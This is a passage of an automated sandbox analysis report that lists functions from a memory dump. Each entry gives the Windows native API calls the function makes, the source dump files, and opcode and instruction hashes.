Uniqueness Score: -1.00%

Function 6AC38B58, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AC38B76
ZwTraceEvent.1105(?,00000402,00000004,?), ref: 6AC38BA3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: e7a43acf6be416f03cc0f6299336bb3f8e833c882b46829a6e64337c5a10b8a3
Instruction ID: 416410593c16fa0e301d986b77cffa1ffc19df6098e2dbb819d58127764b5bf1
Opcode Fuzzy Hash: e7a43acf6be416f03cc0f6299336bb3f8e833c882b46829a6e64337c5a10b8a3
Instruction Fuzzy Hash: 32F082B0A05299ABDB04DBA8D90AE6EB3B4EF04308F410499FA15EB381FF74D900D794

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38CD6, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,6AB8BB24,?,?,?), ref: 6AC38CF4
ZwTraceEvent.1105(?,00000402,000000E4,?,?,?,?,?,?,?,6AB8BB24,?,?,?), ref: 6AC38D21

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: e0510dc539dace430f5430156470ef824dc5d570b50085b0bce82e71a85c947d
Instruction ID: 3d0ab285efe8946f7f062fc281eaaf09d785132161a8de17799d9c6c0bddde7c
Opcode Fuzzy Hash: e0510dc539dace430f5430156470ef824dc5d570b50085b0bce82e71a85c947d
Instruction Fuzzy Hash: 46F0E2B0A05258ABCB04DBBCD949EAE77F4EF09304F110199F915EB281EE34DD00D754

Uniqueness

Uniqueness Score: -1.00%

Function 6AB623F6, Relevance: 3.0, APIs: 2, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.1105(00000000,6AB623E2,?,?,?,?,?,?,?,?,?,6AC3F350,0000004C), ref: 6ABBF652
RtlFreeHeap.1105(?,00000000,?,6AB623E2,?,?,?,?,?,?,?,?,?,6AC3F350,0000004C), ref: 6ABBF662

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: 1368422e5703f006b4c2e4099048bc17ff867176186ad6ff7dc972a6037ed35d
Instruction ID: 28a3227f87d1f9b55a2f226d45b4c5b71ac7ede06a51c8cec3554e43c6165c59
Opcode Fuzzy Hash: 1368422e5703f006b4c2e4099048bc17ff867176186ad6ff7dc972a6037ed35d
Instruction Fuzzy Hash: 77E08C389055C8AFDB06DB64C844BADB772FF44308F020058D411325B2CF76D890FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB935D0, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.1105 ref: 6ABD60B6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: b31b61e56bbf7365befe1471fda9ecd8e000b18281e35e3e03f67fd822c211cf
Instruction ID: 4836a50d225eaa51562a58b10d6c72b6f29a63fd4bdd27955b6d353e261a71c6
Opcode Fuzzy Hash: b31b61e56bbf7365befe1471fda9ecd8e000b18281e35e3e03f67fd822c211cf
Instruction Fuzzy Hash: 016139306686D19FE7249E29C8A0732F7E1EB86304F01856DE596CB2D1DF74E841FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63138, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6AB9174B: ZwFreeVirtualMemory.1105(000000FF,00000000,?,?,00000000,?,00000000,00000001,?,6AC24827,00000000,00008000,?), ref: 6AB91760

RtlGetCurrentServiceSessionId.1105(00000000,00008000), ref: 6AB63189

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFreeMemoryServiceSessionVirtual
String ID:
API String ID: 215549893-0
Opcode ID: 7a4c4478b27b1703825a1fc59715c3ea28cb3ccb0d3ac1c57b79dace3db6b1ef
Instruction ID: 43d73a3ef1e112a0f73008ff12928987f20442a1f12a5c48b1d7a9966c5d2866
Opcode Fuzzy Hash: 7a4c4478b27b1703825a1fc59715c3ea28cb3ccb0d3ac1c57b79dace3db6b1ef
Instruction Fuzzy Hash: 4011D075A04384EFD725CB64C804F6AB7B9EF86318F1485A9E4019B241EFB1EC42EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF4257, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6ABF41E8: RtlEnterCriticalSection.1105(?,6AC408F0,00000008,6ABF426A,6AC408D0,00000008,6AB99B80,?,?,?,?,6AB7ED2D,-00000F38,6AC584D8,6AC584D8,6ABB17F0), ref: 6ABF4206

RtlEnterCriticalSection.1105(?,6AC408D0,00000008,6AB99B80,?,?,?,?,6AB7ED2D,-00000F38,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715), ref: 6ABF4273

Part of subcall function 6AB67055: RtlDebugPrintTimes.1105(00000001,?,6AC3FE98,?,00000000,00000000,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008,6AB99B80), ref: 6AB67086
Part of subcall function 6AB67055: RtlFreeHeap.1105(?,00000000,00000002,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008,6AB99B80,?,?), ref: 6AB670AB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection$DebugFreeHeapPrintTimes
String ID:
API String ID: 4177879599-0
Opcode ID: 907b02c52f957b880416279db2c81ac6afe61f0d89bf5e42b05686351990bda6
Instruction ID: 19caf29c8b27e2a83cc66941b0449912017d9fb259c5292a69bd6da94d4146ed
Opcode Fuzzy Hash: 907b02c52f957b880416279db2c81ac6afe61f0d89bf5e42b05686351990bda6
Instruction Fuzzy Hash: 4B219D74521680CFCB54CF28C204A08BBF1FF86358B598A7EE114DB291EF35D89AEB10

Uniqueness

Uniqueness Score: -1.00%

Function 6AB631E0, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000001,00000000), ref: 6ABBFE2B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
Instruction ID: 152115ee31650861442998587eb7ef65f074d9d51120cadc2eb5d745d6d5ca05
Opcode Fuzzy Hash: cd41840913fde36b44aca51169ed52aaca1c3c379bf37e85e3a76e03a02823ec
Instruction Fuzzy Hash: 5A012832240B80AFD722C67AD904E7BB7E9FFC1714F014419EA6587511DF30E801D760

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38450, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,?,?,?,?,6ABD96F2,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6AC3848B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
Instruction ID: 209ce4d395a38b9fa3b6e467647839975d4049d153fbe0142346c36f711fa442
Opcode Fuzzy Hash: fab0c485f60ad926169880dc8cf1c2acbb4a6bb70ced4fcaa2074de596fe31cb
Instruction Fuzzy Hash: C301DF37200A10BFD7219A79E854F96B7EAFFC5610F054829E656CBA50FE74F880CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7FC77, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6061b1a105af8bd113dd05c63bffe6e8b683994392df491d5f2b64cd8341ed23
Instruction ID: 996c6e0cf3ecce28eb819121757573053574f760cf1a915db136aba694afea8a
Opcode Fuzzy Hash: 6061b1a105af8bd113dd05c63bffe6e8b683994392df491d5f2b64cd8341ed23
Instruction Fuzzy Hash: E6118E702192C0AFD7328B34C554FB93BB8EF06758F1205A5E8B1976E2DF68C980EB15

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7B02A, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: bb9d7fa033737906fb7d4f4d67758d361ed57db008957fcc718e08aa219fcc20
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 5101B1712055C09FD322871CC844F6677E8EF42744F0640A5F926CB652EFA8DC40EB21

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61480, Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6AB6187D: _wcsicmp.1105(0000001C,?,?,?,00000000,?,?,?,?), ref: 6AB61921

RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 6AB614D3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap_wcsicmp
String ID:
API String ID: 3832816018-0
Opcode ID: cf7d4663d62046aefbf398c2601a6ef7ccf85a2c444bb44e9c472d1d2916286d
Instruction ID: 9f1f172868e5a0da865b9b9fba439168ab3dc9891828fb9970463eb3bcb338c2
Opcode Fuzzy Hash: cf7d4663d62046aefbf398c2601a6ef7ccf85a2c444bb44e9c472d1d2916286d
Instruction Fuzzy Hash: F9F08135B02148ABDB15DA49D840EBEB7ADDB84604F1901A9E805E7641DA719E01EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63591, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

ZwSetInformationFile.1105(?,?,?,00000008,0000001E), ref: 6AB635CE

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInformation
String ID:
API String ID: 4253254148-0
Opcode ID: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
Instruction ID: 8c4bdebae186f34a06f147deae26c01dad84ef24a6326c92daf7ab4dcbe6af8f
Opcode Fuzzy Hash: f6e0febadd5fde40c3eeffad060a4314c3d5d20580ee8ab27703d0150818c60e
Instruction Fuzzy Hash: 40F0C271A02298ABEB14CB698858FAEB7B8EF84710F029155ED01D7201DF72D940A790

Uniqueness

Uniqueness Score: -1.00%

Function 6AB61BE9, Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000010,?,C0000017,?,?,6AB616AA,?,?,?,?,?,?,?,?), ref: 6AB61C19

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
Instruction ID: edece980b622fb4d65eb60eb2cb758080e785e24e9ca26a20d433e31e9f1ca48
Opcode Fuzzy Hash: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
Instruction Fuzzy Hash: 72F0C272615248ABE718CF29D800B5AB2EDEF88304F158078D444DB260EA72DD51A364

Uniqueness

Uniqueness Score: -1.00%

Function 6AB94710, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,6AB940DB,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB94716

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction ID: e77dabae8bfb9661239e0e4a8a20a0612a700b3fc20070d958b45adc93c96f74
Opcode Fuzzy Hash: 0df256ba2b9307f516b5a4f7d47ef3065f2fd7a7a153fc2d55d4bb558cf3f2de
Instruction Fuzzy Hash: A5F0A0763083849FC705CF19E050A853BA4EB47354B0100A4E8508B312EF35E881EB40

Uniqueness

Uniqueness Score: -1.00%

Function 6AB615C1, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,00000008,00000000,?,6AB61598,?), ref: 6ABBEF10

Part of subcall function 6AB61480: RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 6AB614D3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
Instruction ID: 4d43113b9f694c3c496cd022b154c22178bc0d7f4211c78e5bac78a84505488d
Opcode Fuzzy Hash: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
Instruction Fuzzy Hash: A6E022316452C5ABDB60DA48E400BAAF3A9EF82708F089071E8058B152DFA0EC81E7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA5C70, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.1105(?,0000000E,00000000,00000004,?,6AC38100,00000000,00000000,00000000,00000000,6AC586C4,6AC586C4,00000008,?,00000000,00000008), ref: 6ABA5C9C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FactoryInformationWorker
String ID:
API String ID: 270927234-0
Opcode ID: 34ebfc428057f1d066085d30c230a90e4380f848c7c6ec9c19e36091452cd574
Instruction ID: c86b47f6b4988e213d24556737c1aafacc38f1fb73c62ccc5c6ed52b85cf186e
Opcode Fuzzy Hash: 34ebfc428057f1d066085d30c230a90e4380f848c7c6ec9c19e36091452cd574
Instruction Fuzzy Hash: DCE0DFB1109288AFFB00CB04C448F193BAAEB44724F01C118E7198B062EF70EA80EB09

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF41E8, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.1105(?,6AC408F0,00000008,6ABF426A,6AC408D0,00000008,6AB99B80,?,?,?,?,6AB7ED2D,-00000F38,6AC584D8,6AC584D8,6ABB17F0), ref: 6ABF4206

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 465591c0d807b4084daf8062ee9c922ade10316bfa7c650c35f20b34613086bb
Instruction ID: c2fddcec10f459299463667149488f629371c4bb0409d37f6448e959ae9c7775
Opcode Fuzzy Hash: 465591c0d807b4084daf8062ee9c922ade10316bfa7c650c35f20b34613086bb
Instruction Fuzzy Hash: 89F0F878431640CECB90CB748604B1836F4F745394F414525F100D6295DF384865FF25

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9A185, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,00000000,00000000,6AB916C5,00000000,?,?,6AB9161A,00000000,00000000,?,00000000,?,?), ref: 6AB9A1BC

Part of subcall function 6AB80010: RtlAcquireSRWLockExclusive.1105(00000180,00000180,00000000,00000000,00000180,?,6AC1BCF6,?,00000000,?,00000000,00000000,00000000), ref: 6AB8002E
Part of subcall function 6AB80010: RtlReleaseSRWLockExclusive.1105(00000180,00000180,00000180,00000000,00000000,00000180,?,6AC1BCF6,?,00000000,?,00000000,00000000,00000000), ref: 6AB80041

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireFreeHeapRelease
String ID:
API String ID: 3645524765-0
Opcode ID: 6cef412d26c91ea9c01eb6a675bcdc082a36e918f53cc5eec453c5ef481b5a3b
Instruction ID: cf455f54d75c8e463dfbfbabf31bbcc39bbc0927f9d17d8d1306a89312af0410
Opcode Fuzzy Hash: 6cef412d26c91ea9c01eb6a675bcdc082a36e918f53cc5eec453c5ef481b5a3b
Instruction Fuzzy Hash: D3D02B6152248057C72C03248858B153663A7C3754F36043CF0074E5A3FF588CF1F50B

Uniqueness

Uniqueness Score: -1.00%

Function 6AB916E0, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6AB91710: RtlAcquireSRWLockExclusive.1105(00000001,?,?,00000001,6AB916ED,?,6AB91630,00000000,?,?,6AB9161A,00000000,00000000,?,00000000,?), ref: 6AB91727
Part of subcall function 6AB91710: RtlReleaseSRWLockExclusive.1105(00000001,00000001,?,?,00000001,6AB916ED,?,6AB91630,00000000,?,?,6AB9161A,00000000,00000000,?,00000000), ref: 6AB91740

RtlAllocateHeap.1105(?,00000000,00000020,?,6AB91630,00000000,?,?,6AB9161A,00000000,00000000,?,00000000,?,?), ref: 6AB91707

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireAllocateHeapRelease
String ID:
API String ID: 614792542-0
Opcode ID: f0c9abe9b1b7a601a1ce7c6e74b73ad7726b6a764b1a7d5261a632b235f70911
Instruction ID: 9fbac6b2ccabe5b08715ab5714ba8e94acb76af1b7caa3a0c606949aa7f8cad6
Opcode Fuzzy Hash: f0c9abe9b1b7a601a1ce7c6e74b73ad7726b6a764b1a7d5261a632b235f70911
Instruction Fuzzy Hash: 03D0A77120118192DA1D4B10A804B183A5ADB81785F3D007CF217495C2DFB4CCA2F06C

Uniqueness

Uniqueness Score: -1.00%

Function 6AB935A1, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.1105(?,6AB932EE,?,0000003A,6AC579A0,?,00000000,6ABB17F0,6AC3FF28,000000FE,?,6AB92F61), ref: 6AB935C1

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 14845ae56d88bc93e7e13586de649d2c15dfd556f439d3f7c3588f7971fc64de
Instruction ID: 4cfc8e07a6f22eb7f99d808d64cc78d9ba88a0b5326aadb02cbe0c405432ebe1
Opcode Fuzzy Hash: 14845ae56d88bc93e7e13586de649d2c15dfd556f439d3f7c3588f7971fc64de
Instruction Fuzzy Hash: 1ED05E314421C099E7419A20C11C75CBA71EF0620CF5510798009454528B2E4909A600

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6DB40, Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000008,00000064,6AB6DB76,6AC566C0,00000000,?,6AB76DDE,6AC566C0,00000000,00000000,00000000,?,6AB9FB90,6AC584D8,?), ref: 6AB6DB4D

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 965ea4c1eef99ad1de18f6b6d1001e116a710e9cacfd7731696b0e480320ba62
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: FBC08C70281A81AAFB220F20DD01B0037A4FB40B05F4600A0A300DA0F0EF79D801F600

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6F340, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d652b91d5ef0918acbf59d3e8cd6e25e6976192bdb4fae21a80d1111f08600d0
Instruction ID: a0c470921a3829c2e10df47f03e4ccecd4d18711dde69c37093964a360b4a55a
Opcode Fuzzy Hash: d652b91d5ef0918acbf59d3e8cd6e25e6976192bdb4fae21a80d1111f08600d0
Instruction Fuzzy Hash: E4C012792615C08FCA01CB288290A883BE0FB80644F8604D0D8018BB22EA18D402EA00

Uniqueness

Uniqueness Score: -1.00%

Function 6AB83A1C, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,?,?,6AB7A436,?,00020019,?,?,000000FA,00000001,?,00000050,?,00000000), ref: 6AB83A2F

Memory Dump Source

